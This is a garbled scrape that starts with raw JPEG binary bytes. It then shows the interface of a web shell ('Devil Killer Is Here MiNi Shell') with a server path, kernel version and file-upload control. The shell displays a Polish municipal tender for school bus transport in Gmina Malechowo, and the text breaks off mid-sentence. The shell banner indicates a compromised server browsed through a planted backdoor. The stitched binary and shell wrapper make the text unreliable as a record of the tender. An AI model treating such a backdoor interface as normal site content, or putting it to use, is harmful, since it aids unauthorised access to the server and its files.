JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250724/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250724/0034306101-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz uczniów do szkół i przedszkoli w Gminie Malechowo w okresie od dnia 1 września 2025 r. do dnia 31 grudnia 2025 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Malechowo</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 330920920</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Malechowo</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Malechowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">76-142</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL426 - Koszaliński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@malechowo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.malechowo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz uczniów do szkół i przedszkoli w Gminie Malechowo w okresie od dnia 1 września 2025 r. do dnia 31 grudnia 2025 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b0f7eb50-dad0-4386-af3a-af9092abdf8c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00343061</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00012337/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Dowóz uczniów do szkół i przedszkoli w Gminie Malechowo w okresie od dnia 1 września 2025 r. do dnia 31 grudnia 2025 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/malechowo <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/malechowo</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Formaty plików wykorzystywanych<br/>przez wykonawców powinny być zgodne z Rozporządzeniem Rady Ministrów z dnia 21 maja 2024 r. w sprawie Krajowych Ram<br/>Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych<br/>wymagań dla systemów teleinformatycznych (t.j. Dz. U. z 2024 r. poz. 773):<br/>1) Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf.<br/>2) W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów:<br/>a) .zip;<br/>b) .7Z.<br/>3) Wśród formatów powszechnych a nie występujących w rozporządzeniu występują: .rar .gif .bmp .numbers .pages. Dokumenty<br/>złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>4) Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max 10MB, oraz<br/>na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max<br/>5MB.<br/>5) Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, zamawiający zaleca, w miarę<br/>możliwości, przekonwertowanie plików składających się na ofertę na format .pdf i opatrzenie ich podpisem kwalifikowanym PAdES.<br/>6) Pliki w innych formatach niż PDF zaleca się opatrzyć zewnętrznym podpisem XAdES. Wykonawca powinien pamiętać, aby plik z<br/>podpisem przekazywać łącznie z dokumentem podpisywanym.<br/>7) Zamawiający zaleca aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego samego rodzaju.<br/>Podpisywanie różnymi rodzajami podpisów np. osobistym i kwalifikowanym może doprowadzić do problemów w weryfikacji plików.<br/>8) Zamawiający zaleca, aby Wykonawca z odpowiednim wyprzedzeniem przetestował możliwość prawidłowego wykorzystania<br/>wybranej metody podpisania plików oferty.<br/>9) Zaleca się, aby komunikacja z wykonawcami odbywała się tylko na Platformie za pośrednictwem formularza “Wyślij wiadomość do<br/>zamawiającego”, nie za pośrednictwem adresu email.<br/>10) Osobą składającą ofertę powinna być osoba kontaktowa podawana w dokumentacji.<br/>11) Ofertę należy przygotować z należytą starannością dla podmiotu ubiegającego się o udzielenie zamówienia publicznego i<br/>zachowaniem odpowiedniego odstępu czasu do zakończenia przyjmowania ofert/wniosków. Sugerujemy złożenie oferty na 24<br/>godziny przed terminem składania ofert/wniosków.<br/>12) Podczas podpisywania plików zaleca się stosowanie algorytmu skrótu SHA2 zamiast SHA1.<br/>13) Jeśli wykonawca pakuje dokumenty np. w plik ZIP zalecamy wcześniejsze podpisanie każdego ze skompresowanych plików.<br/>14) Zamawiający rekomenduje wykorzystanie podpisu z kwalifikowanym znacznikiem czasu.<br/>15) Zamawiający zaleca aby nie wprowadzać jakichkolwiek zmian w plikach po podpisaniu ich podpisem kwalifikowanym. Może to<br/>skutkować naruszeniem integralności plików co równoważne będzie z koniecznością odrzucenia oferty w postępowaniu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający wymaga dołączenia katalogu elektronicznego do oferty</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Na podstawie art. 19 ust. 1 PZP w związku z art. art. 13 ust. 1-3 rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie<br/>o ochronie danych), dalej „RODO”, Zamawiający informuje, że:<br/>1) administratorem Państwa danych osobowych jest Urząd Gminy Malechowo z siedzibą w Malechowo 22A, 76-142 Malechowo;<br/>2) administrator wyznaczył Inspektora Danych Osobowych, adres e-mail: e-mail: iodo@malechowo.pl;<br/>3) Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem<br/>o udzielenie zamówienia publicznego, które jest prowadzone w trybie przetargu nieograniczonego;<br/>4) odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 74 PZP;<br/>5) Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 PZP przez okres<br/>4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czas trwania umowy (art. 78 ust. 4 PZP);<br/>6) obowiązek podania przez Państwa danych osobowych bezpośrednio dotyczących Państwa jest wymogiem określonym w przepisach PZP, związanym z udziałem w niniejszym postępowaniu;<br/>7) w odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do<br/>postanowień art. 22 RODO;<br/>8) posiadają Państwo:<br/>a) zgodnie z art. 15 RODO - prawo dostępu do danych osobowych Państwa dotyczących (z zastrzeżeniem, że w sytuacji, gdy<br/>skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku, mogą Państwo zostać<br/>zobowiązani do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania,<br/>w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego albo sprecyzowania nazwy lub daty<br/>zakończonego postępowania<br/>o udzielenie zamówienia);<br/>b) zgodnie z art. 16 RODO - prawo do sprostowania Państwa danych osobowych (z tym, że skorzystanie z prawa do sprostowania<br/>nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z PZP oraz nie może naruszać integralności protokołu<br/>z postępowania oraz załączników do niego);<br/>c) zgodnie z art. 18 RODO - prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>okresu trwania postępowania<br/>o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia<br/>przetwarzania nie ma zastosowania<br/>w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej<br/>osoby fizycznej lub prawnej, lub<br/>z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają Państwo, że przetwarzanie Państwa<br/>danych osobowych narusza przepisy RODO;<br/>9) nie przysługuje Państwu:<br/>a) zgodnie z art. 17 ust. 3 lit. b, d lub e RODO - prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) zgodnie z art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>d) przysługuje Państwu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Państwa danych<br/>osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki<br/>2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RIGP.271.13.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wykonanie usługi dowozu i odwozu dzieci do szkół autobusami wykonującymi przewozy<br/>osób (dopuszcza się przewozy na liniach regularnych w krajowym transporcie drogowym), tj. do:<br/>1) Zespołu Szkolno-Przedszkolnego w Malechowie, Malechowo 65B;<br/>2) Szkoły Podstawowej w Niemicy, Niemica 31;<br/>3) Szkoły Podstawowej w Lejkowie, Lejkowo 11;<br/>4) Zespołu Szkół w Ostrowcu, Ostrowiec 61,<br/>5) Specjalnego Ośrodka Szkolno – Wychowawczego w Sławnie, Sławno ,ul Mikołaja Kopernika 9<br/>oraz powrotu do miejscowości zamieszkania uczniów po skończonych zajęciach od dnia<br/>1 września 2025 r. do dnia 31 grudnia 2025 r.<br/>Liczba uczniów w okresie realizacji zamówienia to ok. 336 uczniów z podziałem na osoby dowóz do ww. jednostek<br/>oświatowych.<br/>2. Szczegóły dotyczące ilości uczniów z poszczególnych miejscowości, ilości kursów, ram czasowych przyjazdu i odjazdu<br/>uczniów znajdują się w tabelach. Elementy te są zmienne, uzależnione od rzeczywistej ilości uczniów, przepisów<br/>oświatowych i związanej z tym liczby godzin zajęć.<br/>3. Przewóz odbywa się w dni nauki szkolnej zgodnie z ustalonym przez Zamawiającego rozkładem jazdy przekazanym<br/>Wykonawcy po ustaleniu rozkładu zajęć w każdej szkole. W dniach rozpoczęcia i zakończenia zajęć szkolnych, a w<br/>przypadku odpracowywania przez szkoły zajęć w soboty lub dni, w których odbywają się w szkole egzaminy klas VIII, itp.<br/>przewóz odbywać się będzie zgodnie z odrębnym ustalonym w porozumieniu pomiędzy Dyrektorem Szkoły z Wykonawcą rozkładem jazdy.<br/>4. Imienną listę uczniów objętych ulgami i dowozem szkolnym uprawnionych do korzystania z dowozu na koszt Gminy<br/>Malechowo dostarczają dyrektorzy placówek oświatowych do Referatu Oświaty, Kultury i Promocji, który za pomocą poczty<br/>elektronicznej przekazuje łączne dane o ilości osób Wykonawcy.<br/>5. Wykonanie usługi następuje na podstawie miesięcznego zapotrzebowania sporządzonego i podpisanego przez<br/>Zamawiającego oraz dostarczonego do Wykonawcy nie później niż do 25 dnia każdego miesiąca poprzedzającego miesiąc,<br/>w którym usługa będzie wykonywana.<br/>6. Dojazd i powrót dziecka do i ze szkoły na danej trasie nie powinien przekraczać jednorazowo ok. 35 minut, w<br/>optymalnych warunkach.Dla uczniów dowożonych do SOSW Sławno 85 minut. Zamawiający wymaga, aby okres<br/>oczekiwania uczniów na odwóz po zakończonych zajęciach nie był dłuższy niż 2 godziny.<br/>7. Wykonawca zabezpiecza organizację i utrzymanie w należytym stanie środków transportu w szczególności dostosowuje<br/>je do obowiązujących wymogów sanitarnych i obowiązujących wymogów dotyczących dostępności dla osób<br/>niepełnosprawnych. Pojazdy muszą spełniać wymagania, które reguluje Rozporządzenie Ministra Infrastruktury z dnia 31<br/>grudnia 2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (t.j. Dz. U. z 2024<br/>r. poz. 502 z późn. zm.).<br/>Każdy pojazd wyposażony jest w telefon komórkowy, którego numer udostępniony jest dyrektorowi szkoły, dla której<br/>realizowana jest usługa i pracownikowi Urzędu Gminy Malechowo odpowiedzialnemu za realizację dowozów. Wykaz<br/>telefonów zostanie dostarczony do dnia 1 września 2025 r. do Referatu Oświaty, Kultury i Promocji Urzędu Gminy<br/>Malechowo.<br/>8. Wykonawca musi posiadać odpowiedni tabor do przewozu osób w ilości zapewniającej dzieciom i młodzieży szkolnej<br/>przejazd zgodnie z opracowanym rozkładem jazdy. Tabor przeznaczony do dowozu winien posiadać miejsca siedzące dla<br/>każdego ucznia. Wykonawca powinien dysponować, co najmniej 5 autobusami (jeden rezerwowy) o ilości miejsc<br/>zapewniającej wykonanie jednorazowo dowozu uczniów na danej trasie oraz dwoma mikrobusami(jeden rezerwowy) do<br/>przewozu osób z niepełnosprawnością.<br/>9. Wykonawca zobowiązany jest przy realizacji zamówienia do używania pojazdów, które zostały wyprodukowane po roku<br/>2005.<br/>10. Wykonawca zapewni stałą opiekę nad dziećmi w czasie ich przewozu (opiekun poza kierowcą w każdym autobusie)<br/>zgodnie z art. 32 i 39 ustawy Prawo Oświatowe (t.j. Dz. U. z 2024 r. poz. 737 z późn. zm), z uwzględnieniem ewentualnej<br/>pomocy opiekuna dla dzieci z niepełnosprawnością.<br/>11. Kierowca i opiekun w każdym pojeździe musi posiadać przeszkolenie w zakresie przepisów BHP oraz szkolenie z<br/>udzielania pierwszej pomocy przedmedycznej, a w przypadku przewożenia uczniów niepełnosprawnych – ukończony kurs<br/>udzielania pierwszej pomocy. Kierowca lub opiekun muszą posiadać telefon komórkowy, którego numer jest udostępniany<br/>rodzicom dzieci niepełnosprawnych dowożonych danym pojazdem. Oświadczenie pisemne o spełnieniu tych wymagań<br/>Wykonawca przekaże Zamawiającemu do dnia 1 września 2025 r.<br/>12. Liczba kursów dowożących – 1, liczba kursów odwożących dwa lub trzy. Na dzień sporządzenia SWZ nie jest możliwe<br/>określenie liczby kursów powrotnych.<br/>13. Zamawiający zastrzega sobie możliwość dokonywania doraźnych kontroli spełnienia wymienionych wymogów w czasie<br/>obowiązywania umowy.<br/>14. Na podstawie art. 95 ust. 1 ustawy Pzp Zamawiający wymaga zatrudnienia przez wykonawcę, podwykonawcę lub<br/>dalszego podwykonawcę osób wykonujących wszelkie czynności bezpośrednio związane z wykonywaniem usługi, na<br/>podstawie umowy o pracę, tj. kierowców, opiekunów.<br/>15. W związku z powyższym Wykonawca w odniesieniu do swoich pracowników musi przed rozpoczęciem wykonywania<br/>czynności przez te osoby przedstawić pisemne oświadczenie w zakresie określonym w ust. 14. W odniesieniu do<br/>podwykonawców lub dalszych podwykonawców pisemne oświadczenie podwykonawcy lub dalszego podwykonawcy,<br/>w zakresie określonym w ust. 14, należy przedłożyć wraz z kopią umowy<br/>o podwykonawstwo lub dalsze podwykonawstwo.<br/>16. O każdej zmianie personalnej osób wymienionych w ust. 14 Wykonawca zobowiązany jest poinformować<br/>Zamawiającego. Wykonawca będzie mógł powierzyć bezpośrednią realizację usługi osobom wymienionym w ust. 14 dopiero<br/>po dokonaniu zmiany<br/>u Zamawiającego.<br/>17. Zmiany, o których mowa w ust. 16 wymagają przedłożenia Zamawiającemu, nowych pisemnych oświadczeń, o których<br/>stanowi ust. 15.<br/>18. Zamawiającemu w każdym momencie realizacji umowy przysługuje prawo do skontrolowania spełniania wymagań przez<br/>Wykonawcę w zakresie określonym ust. 14. Kontrola dopuszcza zarówno wymóg złożenia przez Wykonawcę stosownego<br/>oświadczenia, jak również przedłożenia dokumentów w postaci zawartych umów o pracę w oryginale do wglądu oraz<br/>dokumentów potwierdzających zgłoszenia pracownika do ZUS. Sankcje z tytułu naruszenia tych wymogów określone są w §<br/>5 niniejszej umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-09-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Maksymalna liczba punktów w danym kryterium równa jest określonej wadze kryterium w %.<br/>2. Ocena łączna stanowi sumę punktów uzyskanych w ramach wszystkich kryteriów. Uzyskana liczba punktów zaokrąglona będzie<br/>do drugiego miejsca po przecinku.<br/>3. Przyznawanie liczby punków poszczególnym ofertom będzie się odbywać według następujących zasad:<br/>a) Cena oferty.<br/>Ocenie zostanie poddana cena brutto oferty obliczona przez Wykonawcę zgodnie z przepisami prawa – podana w Formularzu oferty<br/>(stanowiącym Załącznik nr 1 do SWZ). Liczba punktów, którą można uzyskać w tym kryterium zostanie obliczona według wzoru:<br/>najniższa cena brutto spośród złożonych ofert<br/>liczba punktów = ------------------------------------------------------------ x 60 pkt.<br/>cena brutto oferty ocenianej<br/>b) Wysokość polisy OC.<br/>Wysokość polisy odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia – minimalna<br/>kwota ubezpieczenia: 1.000.000,00 zł. Zamawiający dokona stosownego obliczenia na podstawie wypełnionego Formularza oferty<br/>(stanowiącego Załącznik nr 1 do SWZ) i złożonej w nim deklaracji Wykonawcy o wysokości polisy OC. Liczba punktów, jaką można<br/>uzyskać w tym kryterium zostanie obliczona na podstawie poniższego wzoru:<br/>wartość polisy ocenianej<br/>liczba punktów = ---------------------------------------------- x 40 pkt.<br/>najwyższa wartość polisy<br/>4. Zamówienie zostanie udzielone Wykonawcy, który uzyska najwyższą liczbę punktów<br/>w wyniku oceny oferty.<br/>5. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych<br/>kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej<br/>wadze.<br/>6. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną.<br/>7. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w ust. 6, Zamawiający wzywa Wykonawców, którzy złożyli te<br/>oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.<br/>8. Wykonawcy, składając oferty dodatkowe, nie mogą oferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich<br/>ofertach.<br/>9. Komisja Przetargowa sprawdzi czy oferta spełnia warunki i wymogi ustawy Pzp i SWZ.<br/>10. W toku badania i oceny ofert Zamawiający może żądać udzielenia przez Wykonawców wyjaśnień dotyczących treści złożonych<br/>przez nich ofert.<br/>11. Na podstawie kryteriów oceny ofert Zamawiający będzie oceniał każdą spośród ofert nie podlegających odrzuceniu i wybierze<br/>ofertę najkorzystniejszą.<br/>12. Zamawiający odrzuci ofertę, jeżeli zajdzie co najmniej jedna z przesłanek wymienionych w art. 226 ust. 1 ustawy Pzp.<br/>13. Niezwłocznie po wyborze najkorzystniejszej oferty Zamawiający informuje 